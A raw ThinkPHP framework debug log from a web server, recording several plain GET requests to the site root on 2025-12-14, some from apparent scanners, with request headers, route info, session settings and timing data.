[内存消耗:3,332.90kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001157s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 zgrab/0.x', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001469s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000098s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:45:23+08:00 ] 39.103.152.13 GET / [ info ] 47.105.33.115/ [运行时间:0.026868s][吞吐率:37.22req/s] [内存消耗:3,333.45kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000035s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001128s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'Upgrade, HTTP2-Settings', 'upgrade' => 'h2c', 'http2-settings' => 'AAMAAABkAARAAAAAAAIAAAAA', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36', 'host' => '47.105.33.115', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001455s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000098s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:46:57+08:00 ] 38.101.149.116 GET / [ info ] 47.105.33.115:80/ [运行时间:0.027605s][吞吐率:36.23req/s] [内存消耗:3,285.08kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001137s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Linux Gnu (cow)', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'accept-language' => 'en-GB,en;q=0.5', 'accept-encoding' => 'gzip, deflate', 'connection' => 'close', 'upgrade-insecure-requests' => '1', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001624s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:53:23+08:00 ] 59.82.83.34 GET / [ info ] www.clcoa.com/ [运行时间:0.029232s][吞吐率:34.21req/s] [内存消耗:3,333.27kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001131s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.2409.200 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001533s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:53:24+08:00 ] 59.82.83.34 GET / [ info ] www.clcoa.com/ [运行时间:0.029101s][吞吐率:34.36req/s] [内存消耗:3,333.58kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001111s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.7184.83 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=pkbn1k3d66ansikvmkop262m37', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001541s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000098s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:53:24+08:00 ] 59.82.83.162 GET / [ info ] www.clcoa.com/ [运行时间:0.029280s][吞吐率:34.15req/s] [内存消耗:3,333.55kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001499s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.4646.162 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=pkbn1k3d66ansikvmkop262m37', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001731s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000120s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:53:24+08:00 ] 59.82.83.162 GET / [ info ] www.clcoa.com/ [运行时间:0.026879s][吞吐率:37.20req/s] [内存消耗:3,333.54kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001155s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.7250.76 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=pkbn1k3d66ansikvmkop262m37', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001476s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000099s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:54:33+08:00 ] 139.224.136.79 GET / [ info ] 47.105.33.115/ [运行时间:0.038732s][吞吐率:25.82req/s] [内存消耗:3,333.41kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001221s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'Upgrade, HTTP2-Settings', 'upgrade' => 'h2c', 'http2-settings' => 'AAMAAABkAARAAAAAAAIAAAAA', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36', 'host' => '47.105.33.115', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002351s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000130s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T23:59:11+08:00 ] 104.152.52.70 GET / [ info ] 47.105.33.115/ [运行时间:0.028721s][吞吐率:34.82req/s] [内存消耗:3,332.58kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001183s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'curl/7.61.1', 'accept' => '*/*', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001619s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000124s ] [ info ] [ LOG ] INIT File